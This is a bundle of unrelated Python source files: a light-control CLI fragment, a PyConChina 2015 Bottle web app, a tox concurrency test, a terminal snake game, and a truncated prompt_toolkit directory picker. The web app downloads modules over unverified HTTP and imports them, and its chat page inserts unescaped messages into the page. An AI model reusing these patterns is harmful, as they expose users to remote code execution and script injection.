sys.exit(1)
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to disconnect from light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(disconnectFromLight(0))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error disconnecting from light " + str(maxNumOfAttempts) + " times - quitting out")
sys.exit(1)
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Calculated bytestring:" + updateStatus())
sys.exit(0) |
main.py | #-*-coding:utf-8-*-
#qpy:webapp:PyConChina2015
#qpy:drawer
#qpy://127.0.0.1:8080/
"""
PyConChina2015 App's sourcecode
@Author river
"""
from bottle import Bottle, ServerAdapter
from bottle import run, debug, route, error, static_file, template, redirect
import urllib2
import os
import json
#### Constants #########
ASSETS = "/assets/"  # url prefix under which static files are served (see server_static)
ROOT = os.path.dirname(os.path.abspath(__file__))  # directory containing this script
#### Install the WebApp's dependency modules ####
def _save_from_url(surl, dname):
    """Download *surl* into ROOT/*dname* unless the file already exists.

    Best-effort by design: any download or write failure is silently
    ignored so the app can still start offline; the later
    ``from jsonconv import *`` will fail loudly if the module is missing.
    """
    jfile = ROOT + '/' + dname
    if os.path.exists(jfile):
        return  # already cached, nothing to do
    try:
        data = urllib2.urlopen(surl)
        try:
            # context manager guarantees the file is closed even if the
            # read or write raises (the original leaked both handles and
            # also contained a dead else-branch reading the file into an
            # unused local).
            with open(jfile, 'w') as fd:
                fd.write(data.read())
        finally:
            data.close()
    except Exception:
        # deliberate best-effort: leave the file absent on any failure
        pass
def _setup_webapp_denps():
    """Fetch the pure-python helper modules this web app imports."""
    dependencies = (
        ('http://qpython.org/libs/jsonconv.py', 'jsonconv.py'),
        ('http://qpython.org/libs/ordereddict.py', 'ordereddict.py'),
    )
    for dep_url, dep_name in dependencies:
        _save_from_url(dep_url, dep_name)
#try:
# Download helper modules (best-effort) before importing them.
_setup_webapp_denps()
#except:
#pass
# jsonconv provides json2html, used to render the agenda tables.
from jsonconv import *
######### QPYTHON WEB SERVER ###############
class MyWSGIRefServer(ServerAdapter):
    # Bottle ServerAdapter backed by the stdlib wsgiref server, extended
    # with stop() so the QPython host can shut the app down remotely
    # (wired to the /__exit route below).
    server = None

    def run(self, handler):
        """Create the wsgiref server and serve until stop() is called."""
        from wsgiref.simple_server import make_server, WSGIRequestHandler
        if self.quiet:
            class QuietHandler(WSGIRequestHandler):
                # silence the per-request access log line
                def log_request(*args, **kw): pass
            self.options['handler_class'] = QuietHandler
        self.server = make_server(self.host, self.port, handler, **self.options)
        self.server.serve_forever()

    def stop(self):
        """Stop the serving loop; called from a request handler thread."""
        #sys.stderr.close()
        import threading
        # shutdown() blocks until serve_forever() returns, so it must run
        # on a helper thread.  NOTE(review): server_close() below is called
        # without waiting for that thread - looks racy, confirm intended.
        threading.Thread(target=self.server.shutdown).start()
        #self.server.shutdown()
        self.server.server_close()
        # marker line the QPython wrapper watches for on stdout
        print "# QWEBAPPEND"
######### BUILT-IN ROUTERS ###############
def __exit():
    """Route handler for /__exit: stop the embedded WSGI server."""
    global server
    server.stop()
def __ping():
    """Route handler for /__ping: liveness probe used by the QPython host."""
    return "ok"
def server_static(filepath):
    """Serve files under ROOT/assets for the /assets/<filepath> route."""
    return static_file(filepath, root=ROOT+'/assets')
########################################
# Shared HTML page shell.  The two %s slots are filled per page with
# (document-ready javascript, body HTML); the {{assets}} placeholder is
# rewritten to the ASSETS prefix immediately below.  Literal CSS percent
# signs are doubled (100%%) because the template is later combined with
# the % operator.
PAGE_TEMP = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<meta name="description" content="">
<meta name="author" content="">
<script src="{{assets}}jquery.min.js"></script>
<link href="{{assets}}bootstrap.min.css" rel="stylesheet" />
<script src="{{assets}}bootstrap.min.js"></script>
<script language='javascript'>
$(document).ready(function(){
%s
});
</script>
<style>
.btn-info { background-color:#ffe052;border-color:#ffe052;color:black}
.placeholder { padding-top:10px;padding-bottom:10px }
.col-xs-6, .col-sm-4 { padding:10px }
ul{ list-style-type: none; margin:0px;padding:0px }
tbody tr th:first-child{ width:80px }
table.nolimit tbody tr th:first-child{ width:auto }
.tt { padding-left:10px; }
.float-right { float:right }
.float-left { float:left }
.center { text-align:center }
.p5 { padding:5px }
.circle {
width: 100%%;
height: 150px;
border-radius: 1px;
border-color: 1px solid #ddd;
border: solid 1px #ddd;
}
.circle-view {
background-color: #fdfdfd;
}
.circle-text {
padding: 15px 15px 15px 15px;
text-align: center;
font-size:18px;
}
</style>
</head>
<body>
%s
</body>
</html>
""".replace("{{assets}}",ASSETS)
def home():
    """Route handler for /: landing page linking to the three city agendas.

    The trailing inline <script> registers the QPython drawer menu
    through the milib javascript bridge.
    """
    JS = ""
    CONTENT = """
<nav class="navbar-inverse" role="navigation" id="navigation" style="background:#f9f9f9;border-bottom:1px solid #eee">
<div class="container">
<ul>
<a class="navbar-brand" style='color: #000;font-size: 23px;font-weight: bold;padding:10px;margin-left:0px' href="#">
<img src="http://pyconcn.qiniucdn.com/zoomquiet/res/logo/150801-cnpycon-barnner-h80.png" height="32">
<span></span>
</a>
<div style="float:right;margin: 10px 10px 0 0;" >
已闭幕,可下载现场记录
<!--button onclick="milib.openUrl('http://cn.pycon.org/2015/proposals.html')" class="btn btn-info" >
提交主题
</button-->
</div>
</ul>
<div style="clear:both"></div>
<div style="padding:0px 15px 10px 15px">
PyCon 是全球 Pythoneer 最盛大的年度聚会,由 PSF(Python 基金会)支持,致力于营造愉快的多元化的 Python 技术主题大会. PyConChina 是由 CPyUG(华蠎用户组)获得授权举办的 中国PyCon 年会. 迄今已是第五届, 目前大会已结束,大会幻灯,视频,录音可以通过本App下载.
</div>
</div>
</nav>
<div class="table-responsive" style='border:0px'>
<div class="container">
<div class="row" style='border:0px;padding-left:10px;padding-right:10px;padding-top:10px'>
<div class="col-xs-6 col-sm-4 placeholder" onclick="location.href='/beijing/agenda'" >
<div class="col-lg-4 circle circle-view">
<span style="">
<br />
<br />
<br />
<a class="circle-text">
PyCon 北京
</a>
<span style="color:grey;padding-left:15px;">已结束</span>
</span>
</div><!-- /.col-lg-4 -->
</div>
<div class="col-xs-6 col-sm-4 placeholder" onclick="location.href='/shanghai/agenda'" >
<div class="col-lg-4 circle circle-view">
<span>
<br />
<br />
<br />
<a class="circle-text" >
PyCon 上海
</a>
<span style="color:grey;padding-left:15px;">已结束</span>
</span>
</div><!-- /.col-lg-4 -->
</div>
<div class="col-xs-6 col-sm-4 placeholder" onclick="location.href='/guangzhou/agenda'" >
<div class="col-lg-4 circle circle-view">
<span>
<br />
<br />
<br />
<a class="circle-text" >
PyCon 广州
</a>
<span style="color:grey;padding-left:15px;">已结束</span>
</span>
</div><!-- /.col-lg-4 -->
</div>
</div>
</div>
</div>
<script language='javascript'>milib.showDrawerMenu('{"menu":[{"title":"北京","url":"http://127.0.0.1:8080/beijing/agenda","icon":""},{"title":"上海","url":"http://127.0.0.1:8080/shanghai/agenda","icon":""},{"title":"广州","url":"http://127.0.0.1:8080/guangzhou/agenda","icon":""},{"title":"聊天室(New)","url":"http://127.0.0.1:8080/chat","icon":""}]}')</script>
"""
    return template(PAGE_TEMP % (JS, CONTENT))
def _get_json_content():
    """Return the PyConChina 2015 conference JSON as a raw string.

    Downloaded once from cn.pycon.org and cached in ROOT/pycon2.json;
    subsequent calls read the cached file.  Propagates any download or
    file-system error to the caller (the original also did not catch
    them, but leaked the url/file handles on error - fixed with
    try/finally and context managers).
    """
    jurl = 'http://cn.pycon.org/2015/pycon.json'
    jfile = ROOT + '/pycon2.json'
    if not os.path.exists(jfile):
        data = urllib2.urlopen(jurl)
        try:
            content = data.read()
        finally:
            data.close()
        # cache for subsequent requests
        with open(jfile, 'w') as fd:
            fd.write(content)
    else:
        with open(jfile) as fd:
            content = fd.read()
    return content
def get_speakers():
    """Route handler for /speakers/: the speakers mapping from the
    conference JSON (bottle serialises the dict to a JSON response)."""
    conference = json.loads(_get_json_content())
    return conference['speakers']
def beijing():
    """Route handler for /beijing/agenda."""
    return _agenda('beijing',u'PyCon 北京日程', u'http://event.31huiyi.com/118591776')
def shanghai():
    """Route handler for /shanghai/agenda."""
    return _agenda('shanghai',u'PyCon 上海日程', u'http://event.31huiyi.com/118022165')
def guangzhou():
    """Route handler for /guangzhou/agenda."""
    return _agenda('guangzhou',u'PyCon 广州日程', u'http://event.31huiyi.com/118545334')
def _agenda(wh, title, url):
    """Render the agenda page for one city.

    wh    -- key into the JSON 'agenda' mapping ('beijing', 'shanghai', ...)
    title -- page heading text
    url   -- signup url, opened via the milib javascript bridge
    """
    content = _get_json_content()
    jdata = json.loads(content)
    agd = jdata['agenda'][wh]
    # Client-side JS: after page load fetch /speakers/ and replace the
    # speaker-id table cells with topic title + download links.
    J = u"""
$.get('/speakers/', null, function(data){
$('th').each(function(){
var val = $(this).html()
if (val=='speaker') {
$(this).html('主题')
} else if (val == 'time') {
$(this).html('时间')
} else if (val == 'topic') {
$(this).html('')
}
});
$('td').each(function(){
var val = $(this).html()
if (typeof(data[val])!="undefined") {
//console.log(data[val]['topic']['title'])
//if (data[val]['topic']['audio']!=undefined) {
$(this).html(data[val]['topic']['title']+" - "+data[val]['name']+"<div style='color:grey'>"+data[val]['topic']['preview']+"</div><br /><div>"+
(data[val]['topic']['video']?"<a style=\\"font-size:20px\\"onclick=\\"milib.openUrl('"+data[val]['topic']['video']+"')\\">下载视频</a> ":"")+
(data[val]['topic']['audio']?"<a style=\\"font-size:20px\\"onclick=\\"milib.openUrl('"+data[val]['topic']['audio']+"')\\">下载录音</a> ":"")+
(data[val]['topic']['slide']?"<a style=\\"font-size:20px\\"onclick=\\"milib.openUrl('"+data[val]['topic']['slide']+"')\\">下载幻灯</a>":"")+
"</div>")
}
})
});"""
    # Header block: title, signup button, and a date/venue/traffic table.
    O = u"""<h4 class='tt float-left'>%s</h4>
<div style="float:right;margin: 10px 10px 0 0;" >
<button onclick="milib.openUrl('%s')" class="btn btn-info" >
报名参加
</button>
</div>
<div style='clear:both;padding-bottom:10px'></div>
<table class="table table-bordered table-hover">
<tr><th>日期</th><td>%s</td></tr>
<tr><th>地点</th><td>%s<br />%s</td></tr>
<tr><th>交通</th><td>%s</td></tr>
<tr><th>事件</th><td>%s</td></tr>
<tr><th>注意</th><td>%s</td></tr>
</table>
""" % (title,
       url,
       agd['date'],
       agd['address'],
       agd["maplink"],
       agd['traffic'],
       agd['venue'],
       agd['notices']
       )
    # NOTE(review): L is built but never used anywhere below - dead code?
    L = u"""<div style='text-align:center;padding:10px'><button onclick="milib.openUrl('%s')" class="btn btn-lg btn-success" >报名参加</button></div>""" % url
    # Session tables, one HTML table per talk, grouped by time of day.
    M = u"<h5 class='tt'>早上</h5>"
    for item in agd['morning']:
        M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
    M = M+u"<h5 class='tt'>中午</h5>"
    for item in agd['noon']:
        M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
    M = M+u"<h5 class='tt'>下午</h5>"
    for item in agd['afternoon']:
        M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
    M = M+u"<h5 class='tt'>闪电演讲</h5>"
    for item in agd['lightening_talks']:
        M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
    M = M+u"<h5 class='tt'>已取消</h5>"
    if agd['cancel_talks']:
        for item in agd['cancel_talks']:
            M = M+json2html.convert(json=item, table_attributes="class=\"table table-bordered table-hover\"")
    D = u""""""
    O = O+M
    return template(PAGE_TEMP % (J,O+D))
def chat():
    """Route handler for /chat: SockJS-backed chat room page.

    All behaviour is client side: J holds the javascript (connect with
    retry, send on enter, nickname modal), C holds the CSS + markup.
    """
    # Chat client JS: reconnect loop against quseit.cn:6975/mobilechat.
    J="""
var connectToServer = function () {
//Connect to your server here
var mobileChatSocket = new SockJS('http://quseit.cn:6975/mobilechat');
mobileChatSocket.onopen = function () {
clearInterval(connectRetry);
$('.connect-status')
.removeClass('disconnected')
.addClass('connected')
.text('已连接');
};
//Receive message from server
mobileChatSocket.onmessage = function (e) {
$('#chatBox').html($('#chatBox').html() + '</br>' + e.data);
var objDiv = document.getElementById('chatBox');
objDiv.scrollTop = objDiv.scrollHeight;
};
mobileChatSocket.onclose = function () {
clearInterval(connectRetry);
connectRetry = setInterval(connectToServer, 1000);
$('.connect-status')
.removeClass('connected')
.addClass('disconnected')
.text('Disconnected');
};
//Send your message to the server.
$('#sendButton').on('click', function () {
if ($('#userName').val() != '') {
if ($('#messageBox').val() != '') {
mobileChatSocket.send($('#userName').val() + ': ' + $('#messageBox').val());
document.getElementById("messageBox").value = '';
}
} else {
alert('请先设置昵称');
var objDiv = document.getElementById('chatBox');
objDiv.scrollTop = objDiv.scrollHeight;
}
});
//Prevent enter refreshing the page, it sends the text from now on
$('#messageBox').keydown(function (e) {
if (e.keyCode == 13) { // 13 is enter
if ($('#userName').val() != '') {
if ($('#messageBox').val() != '') {
mobileChatSocket.send($('#userName').val() + ': ' + $('#messageBox').val());
document.getElementById("messageBox").value = '';
}
} else {
alert('请先设置昵称');
var objDiv = document.getElementById('chatBox');
objDiv.scrollTop = objDiv.scrollHeight;
}
return false;
}
});
//Prevent enter refreshing the page
$('#messageBox').keydown(function (e) {
if (e.keyCode == 13) { // 13 is enter
return false;
}
});
$('#userName').bind('input propertychange', function() {
$('#mynick').html($(this).val())
});
};
var connectRetry = setInterval(connectToServer, 1000);
"""
    # Page body: chat log, message form footer, and the nickname modal.
    # (CSS percent signs are doubled because of the % substitution below.)
    C="""
<style>
html {
position: relative;
min-height: 100%;
}
body {
margin-bottom: 60px;
}
.footer {
position: absolute;
bottom: 0;
width: 100%;
height: 60px;
background-color: #f5f5f5;
}
.container {
width: auto;
max-width: 680px;
padding: 0 15px;
}
.container .text-muted {
margin: 20px 0;
}
#signInForm, #messageForm {
margin: 0px;
margin-bottom: 1px;
}
#chatBox {
padding:2px;
font-family: '宋体','Arial';
font-size: 13px;
color: black;
border: 1px #eee solid;
width: 100%%;
overflow: scroll;
height:150px;
margin-left: 1px;
}
#message {
width: 100%%;
height: 22px;
float: left;
margin-left: 1px;
margin-top: 1px;
}
.disconnected {
color: red;
}
.connected {
color: green;
}
.status {
font-size:13px
}
</style>
<div class="container">
<h4>PyConChina 聊天室 <span style='padding-top:5px' class="status">( 状态:<span class="connect-status disconnected">断线</span> )</span> <span style='font-size:13px'><a data-toggle="modal" data-target="#myModal" href='#' id='mynick' style='float:right'>设置昵称</a></span></h4>
<hr />
<span style='color:grey'>无认证,不存历史纪录,不支持刷新。<br/>想看看谁在?吼一嗓子。</span>
<div id="chatBox"></div>
</div>
<script src="http://cdnjs.cloudflare.com/ajax/libs/sockjs-client/0.3.4/sockjs.min.js"></script>
<footer class="footer">
<div class="container" style='padding-top:10px'>
<form id="messageForm" class="form-group">
<input id="messageBox" type="text" value="" class='form-control' placeholder='回车发言'>
<!--input id="sendButton" type="button" value="发送" style="width:15%%;float:right" class="btn btn-success"-->
</form>
</div>
</footer>
<!-- Modal: nickname picker -->
<div class="modal fade" id="myModal" tabindex="-1" role="dialog"
aria-labelledby="myModalLabel" aria-hidden="true">
<form id="signInForm" class="form-group">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close"
data-dismiss="modal" aria-hidden="true">
×
</button>
<h4 class="modal-title" id="myModalLabel">
设置昵称
</h4>
</div>
<div class="modal-body">
<input id="userName" type="text" class='form-control'>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" id="changeNameButton" name="changeName" data-dismiss="modal">
设置昵称
</button>
</div>
</div><!-- /.modal-content -->
</form>
</div><!-- /.modal -->
"""
    return template(PAGE_TEMP % (J,C))
######### WEBAPP ROUTERS ###############
# Bind handlers to urls.  app.route(path)(handler) is used instead of
# decorators so the built-in QPython routes (__exit/__ping) and the page
# handlers register through the same pattern.
app = Bottle()
app.route('/', method='GET')(home)
app.route('/__exit', method=['GET','HEAD'])(__exit)
app.route('/__ping', method=['GET','HEAD'])(__ping)
app.route('/assets/:filepath', method='GET')(server_static)
app.route('/beijing/agenda', method='GET')(beijing)
app.route('/shanghai/agenda', method='GET')(shanghai)
app.route('/guangzhou/agenda', method='GET')(guangzhou)
app.route('/speakers/', method='GET')(get_speakers)
app.route('/chat', method='GET')(chat)
# Start the blocking wsgiref server; the /__exit route stops it.
try:
    server = MyWSGIRefServer(host="127.0.0.1", port="8080")
    app.run(server=server,reloader=False)
except Exception,ex:
    print "Exception: %s" % repr(ex)
test_package_parallel.py | import traceback
import py
from tox.session.commands.run import sequential
def test_tox_parallel_build_safe(initproj, cmd, mock_venv, monkeypatch):
    """Two concurrent tox runs building the same package must serialise on
    the package lock, both succeed, and each clean up its own build package.

    Bug fixed versus the previous version: t2_package was read from
    invoke_result["t1"] (so the "t2 package removed" assertion never
    tested t2), and the inequality assert compared the Thread objects
    instead of the two package paths.
    """
    initproj(
        "env_var_test",
        filedefs={
            "tox.ini": """
[tox]
envlist = py
install_cmd = python -m -c 'print("ok")' -- {opts} {packages}'
[testenv]
commands = python -c 'import sys; print(sys.version)'
"""
        },
    )
    # we try to recreate the following situation
    # t1 starts and performs build
    # t2 starts, but is blocked from t1 build lock to build
    # t1 gets unblocked, t2 can now enter
    # t1 is artificially blocked to run test command until t2 finishes build
    # (parallel build package present)
    # t2 package build finishes both t1 and t2 can now finish and clean up
    # their build packages
    import tox.package
    import threading

    t1_build_started = threading.Event()
    t1_build_blocker = threading.Event()
    t2_build_started = threading.Event()
    t2_build_finished = threading.Event()

    invoke_result = {}

    def invoke_tox_in_thread(thread_name):
        # capture either the command result or the raised exception
        try:
            result = cmd("--parallel--safe-build", "-vv")
        except Exception as exception:
            result = exception, traceback.format_exc()
        invoke_result[thread_name] = result

    prev_build_package = tox.package.build_package

    with monkeypatch.context() as m:
        # t1's build signals that it started, then blocks until released
        def build_package(config, session):
            t1_build_started.set()
            t1_build_blocker.wait()
            return prev_build_package(config, session)

        m.setattr(tox.package, "build_package", build_package)

        prev_run_test_env = sequential.runtestenv

        # t1 must not run its test commands until t2's build has finished
        def run_test_env(venv, redirect=False):
            t2_build_finished.wait()
            return prev_run_test_env(venv, redirect)

        m.setattr(sequential, "runtestenv", run_test_env)

        t1 = threading.Thread(target=invoke_tox_in_thread, args=("t1",))
        t1.start()
        t1_build_started.wait()

    with monkeypatch.context() as m:
        # t2's build signals start and completion
        def build_package(config, session):
            t2_build_started.set()
            try:
                return prev_build_package(config, session)
            finally:
                t2_build_finished.set()

        m.setattr(tox.package, "build_package", build_package)

        t2 = threading.Thread(target=invoke_tox_in_thread, args=("t2",))
        t2.start()

        # t2 should get blocked by t1 build lock
        t2_build_started.wait(timeout=0.1)
        assert not t2_build_started.is_set()

        t1_build_blocker.set()  # release t1 blocker -> t1 can now finish
        # t1 at this point should block at run test until t2 build finishes
        t2_build_started.wait()
        t1.join()  # wait for both t1 and t2 to finish
        t2.join()

    # all threads finished without error
    for val in invoke_result.values():
        if isinstance(val, tuple):
            assert False, "{!r}\n{}".format(val[0], val[1])
    err = "\n".join(
        "{}=\n{}".format(k, v.err).strip() for k, v in invoke_result.items() if v.err.strip()
    )
    out = "\n".join(
        "{}=\n{}".format(k, v.out).strip() for k, v in invoke_result.items() if v.out.strip()
    )
    for val in invoke_result.values():
        assert not val.ret, "{}\n{}".format(err, out)
    assert not err

    # when the lock is hit we notify
    lock_file = py.path.local().join(".tox", ".package.lock")
    msg = "lock file {} present, will block until released".format(lock_file)
    assert msg in out

    # intermediate packages are removed at end of build
    t1_package = invoke_result["t1"].session.getvenv("py").package
    t2_package = invoke_result["t2"].session.getvenv("py").package
    assert t1_package != t2_package
    assert not t1_package.exists()
    assert not t2_package.exists()

    # the final distribution remains
    dist_after = invoke_result["t1"].session.config.distdir.listdir()
    assert len(dist_after) == 1
    sdist = dist_after[0]
    assert t1_package != sdist
|
snake.py | #!/usr/bin/env python2
import sys
import os
import tty
import select
import json
import termios
from copy import deepcopy as copy
from multiprocessing import Process
from time import sleep
from random import randint
class Snake:
    # Terminal snake game: raw-tty WASD input, frame redraw via print,
    # and JSON-file highscore persistence (nested Highscore class).

    def __init__(self):
        # board size in cells; a border is drawn around this area
        self.height = 20
        self.width = 20
        self.length = 1
        self.sleep_time = 0.1  # seconds per frame
        # path: [x, y] cells occupied by the snake, tail first, head last
        self.path = []
        self.apples = []  # [x, y] apple positions
        self.start_pos = [1,2]
        self.path.append(self.start_pos)
        # Char stuff
        self.border_char = '|'
        self.snake_char = '*'
        self.padd_char = ' '
        self.apple_char = '~'
        self.spider_char = '$'  # NOTE(review): never drawn anywhere - unused?
        self.last_input = None
        self.dir = 'e'  # current heading: 'n'/'e'/'s'/'w'
        self.score = 0
        # Read the highscores.
        self.hs = self.Highscore()
        # some test data!
        self.add_new_apple()
        # Put the terminal into raw mode so single keys arrive immediately;
        # the previous mode is saved for restoration in __exit__.
        fd = sys.stdin.fileno()
        self.old_tty = termios.tcgetattr(fd)
        tty.setraw(sys.stdin.fileno())

    def __exit__(self):
        # restore the terminal mode saved in __init__
        fd = sys.stdin.fileno()
        termios.tcsetattr(fd, termios.TCSADRAIN, self.old_tty)

    class Highscore():
        # JSON-file backed highscore table:
        # {"Highscores": [{"nick": ..., "score": ...}, ...]}

        def __init__(self):
            self.file = "highscores.json"
            try:
                fh = open(self.file)
                self.data = json.loads(fh.read())
                self.highscores = self.data['Highscores']
                fh.close()
            except:
                # missing or corrupt file: start with an empty table
                print("File dosn't exist, or corrupt file!")
                self.data = {}
                self.data['Highscores'] = []
                self.highscores = self.data['Highscores']
        # finally:

        def add_score(self, nick, score):
            # Keep the best score per nick; append unknown nicks.
            for entry in self.highscores:
                if entry['nick'] == nick:
                    print("Nick exist override the score!")
                    if score >= entry['score']:
                        entry['score'] = score
                    return
            self.highscores.append({'nick': nick, 'score': score})

        def save(self):
            # best-effort write of the whole table back to disk
            try:
                fh = open(self.file, 'w+')
                fh.write(json.dumps(self.data, sort_keys=True, indent=3, separators=(',', ': ')))
                fh.close()
            except:
                print("Failed to save highscores")

    def empty_array(self, array):
        # overwrite every cell with the padding char, in place
        for i in range(0,len(array)):
            array[i] = self.padd_char

    def read_input(self):
        # non-blocking single-character read; None when no key is pending
        while select.select([sys.stdin],[], [], 0) == ([sys.stdin], [], []):
            return sys.stdin.read(1)
        return None

    def draw(self):
        """Render the border, apples and snake to the terminal."""
        data_map = []
        row = []
        # Create the right length of a row
        for i in range(0,self.width+2):
            row.append(self.padd_char)
        row[0] = self.border_char
        row[self.width+1] = self.border_char
        # Create the right length of a column
        # and fill it with copies of row
        for i in range(0,self.height+2):
            data_map.append(copy(row))
        # Create the top and bottom border lines
        for u in {0, self.height+1}:
            for i in range(0, self.width+2):
                data_map[u][i] = self.border_char
        # +1 offsets translate board coordinates into the bordered map
        for apple in self.apples:
            data_map[apple[1]+1][apple[0]+1] = self.apple_char
        for pos in self.path:
            data_map[pos[1]+1][pos[0]+1] = self.snake_char
        # "Clear" the screen by pushing the old frame off with newlines
        print("\r\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
        # Print a nice header (trailing commas: py2 print without newline)
        for u in range(0, self.width + 2):
            print(self.border_char),
        print("\r\n%c Snake%*c" % (self.border_char, self.width*2-(17), ' ')),
        print("Score: %3d %c" % (self.score, self.border_char)),
        # Print the map
        print('\r')
        for i in range(0,self.height+2):
            for u in range(0,self.width+2):
                row = data_map[i]
                print(row[u]) ,
            print('\r')

    def got_apple(self, pos):
        # True when an apple occupies pos
        for apple in self.apples:
            if pos == apple:
                return True
        return False

    def add_new_apple(self):
        # NOTE(review): if the random cell already holds an apple, no
        # apple is added at all this call - confirm that is intended.
        x = randint(0,self.width-1)
        y = randint(0,self.height-1)
        pos = [x,y]
        if not self.got_apple(pos):
            self.apples.append(pos)

    def self_hit(self, pos):
        # True when pos collides with the snake's own body
        for loc in self.path:
            if loc == pos:
                return True
        return False

    # n
    # e w
    # s
    # w
    # a d
    # s
    def logic(self):
        """Advance one game tick; returns False when the snake dies."""
        self.last_input = self.read_input()
        if self.last_input is not None:
            # WASD steering; turning straight back on yourself is ignored
            if self.last_input == 'a' and not self.dir == 'e':
                print "Setting dir: w"
                self.dir = 'w'
            elif self.last_input == 'w' and not self.dir == 's':
                print "Setting dir: n"
                self.dir = 'n'
            elif self.last_input == 'd' and not self.dir == 'w':
                print "Setting dir: e"
                self.dir = 'e'
            elif self.last_input == 's' and not self.dir == 'n':
                print "Setting dir: s"
                self.dir = 's'
            elif self.last_input == 'q': #quits the game
                self.__exit__()
                exit()
            self.last_input = None
        # move the head one cell in the current direction
        last_pos = self.path[-1]
        new_pos = copy(last_pos)
        if self.dir is 'e':
            new_pos[0] += 1
        if self.dir is 'w':
            new_pos[0] -= 1
        if self.dir is 'n':
            new_pos[1] -= 1
        if self.dir is 's':
            new_pos[1] += 1
        # wrap around the board edges
        if new_pos[0] >= self.width:
            new_pos[0] = 0
        if new_pos[0] < 0:
            new_pos[0] = self.width-1
        if new_pos[1] >= self.height:
            new_pos[1] = 0
        if new_pos[1] < 0:
            new_pos[1] = self.height-1
        if self.self_hit(new_pos):
            return False
        self.path.append(new_pos)
        # if not self.extend:
        if not self.got_apple(new_pos):
            # no apple eaten: drop the tail so length stays constant
            self.path.pop(0)
        else:
            # apple eaten: keep the tail (snake grows), respawn an apple
            self.apples.pop(self.apples.index(new_pos))
            self.add_new_apple()
            self.score += 1
        return True

    def run(self):
        # main game loop: tick, draw, sleep; on death record the score
        while 1:
            if not self.logic():
                self.__exit__()
                nick = raw_input("Nickname: ")
                self.hs.add_score(nick, self.score)
                self.hs.save()
                print("Dead!")
                break;
            self.draw()
            sleep(self.sleep_time)

    def start(self):
        # hs = Highscore()
        self.run()
        #p = Process(target=self.run)
        #p.start()
        #while 1:
        # sleep(1)
        # self.last_input = raw_input()
        # print self.path
        # sleep(4)
        #p.join()
#a = Snake.Highscore()
#a.add_score("0st3n", randint(0,1000))
#a.save()
if __name__ == '__main__':
    # pass
    # Run the game; __exit__ restores the terminal mode afterwards.
    a = Snake()
    a.start()
    a.__exit__()
choose_remote_dir.py | import difflib
import logging
import os
import threading
import time
from enum import Enum
from queue import Empty, Queue
from prompt_toolkit.application.current import get_app
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.layout import HSplit, VSplit
from prompt_toolkit.layout.containers import Window
from prompt_toolkit.layout.controls import FormattedTextControl
from prompt_toolkit.widgets import TextArea
from ..pubsub import Messages
from .base import BaseScreen
from .loading import LoadingIndicator
class RemoteDirMessages(Enum):
    """Pubsub messages used only within this module.

    NEW_SUBDIRECTORIES_WALKED        -- AsyncCompleter cached a new directory
    SUBDIRECTORY_WALKER_STATUS_CHANGE -- walker flipped between busy/idle
    """
    NEW_SUBDIRECTORIES_WALKED = "NEW_SUBDIRECTORIES_WALKED"
    SUBDIRECTORY_WALKER_STATUS_CHANGE = "SUBDIRECTORY_WALKER_STATUS_CHANGE"
class Completions(object):
    """Vertical list of completions with a two-column '>' selection margin."""

    def __init__(self):
        self._completions = None
        self._current_index = None
        self._control = FormattedTextControl("")
        self._margin_control = FormattedTextControl("")
        self._margin = Window(self._margin_control, width=2)
        self.container = VSplit([self._margin, Window(self._control)])

    def set_completions(self, completions):
        """Replace the completion list and reset the selection to the top."""
        self._completions = completions
        self._current_index = 0 if completions else None
        self._render()

    def move_selection_down(self):
        self._shift_selection(1)

    def move_selection_up(self):
        self._shift_selection(-1)

    def _shift_selection(self, delta):
        # No-op until a non-empty completion list has been set.
        if self._current_index is None or self._completions is None:
            return
        self._current_index = (self._current_index + delta) % len(
            self._completions
        )
        self._render()

    def current_selection(self):
        """The highlighted completion, or None when nothing is selectable."""
        if self._current_index is None or self._completions is None:
            return None
        return self._completions[self._current_index]

    def _render(self):
        # Repaint both the completion column and the selection margin.
        if self._completions is None:
            self._control.text = ""
            return
        self._control.text = "\n".join(self._completions)
        self._margin_control.text = "\n".join(
            "> " if idx == self._current_index else "  "
            for idx in range(len(self._completions))
        )
class AsyncCompleterStatus(object):
    # Two-line status area: a spinner plus the path currently being walked
    # by AsyncCompleter.  A daemon thread advances the spinner twice a
    # second and invalidates the prompt_toolkit app to trigger a repaint.

    def __init__(self):
        self._loading_indicator = LoadingIndicator()
        self._status = "IDLE"          # "IDLE" hides the line entirely
        self._current_path = None      # path shown next to the spinner
        self._control = FormattedTextControl()
        self.container = HSplit(
            [Window(height=1), Window(self._control, height=1)], height=2
        )
        self._thread = None
        self._stop_event = threading.Event()
        self._start_updating_loading_indicator()

    def _render(self):
        # Rebuild the status line from the current status/path/spinner.
        if self._status == "IDLE":
            self._control.text = ""
        else:
            if self._current_path is not None:
                self._control.text = "{} Fetching subdirectories of {}".format(
                    self._loading_indicator.current(), self._current_path
                )
            else:
                self._control.text = self._loading_indicator.current()

    def set_status(self, status, current_path=None):
        # status: "IDLE" or anything else (treated as busy)
        self._status = status
        self._current_path = current_path
        self._render()

    def _start_updating_loading_indicator(self):
        def run():
            app = get_app()
            while not self._stop_event.is_set():
                self._loading_indicator.next()
                self._render()
                time.sleep(0.5)
                app.invalidate()
        self._thread = threading.Thread(target=run, daemon=True)
        self._thread.start()

    def stop(self):
        # Signal the spinner thread to exit (daemon thread, no join needed).
        self._stop_event.set()
class AsyncCompleter(object):
    """Walk remote directories on a background thread and cache results.

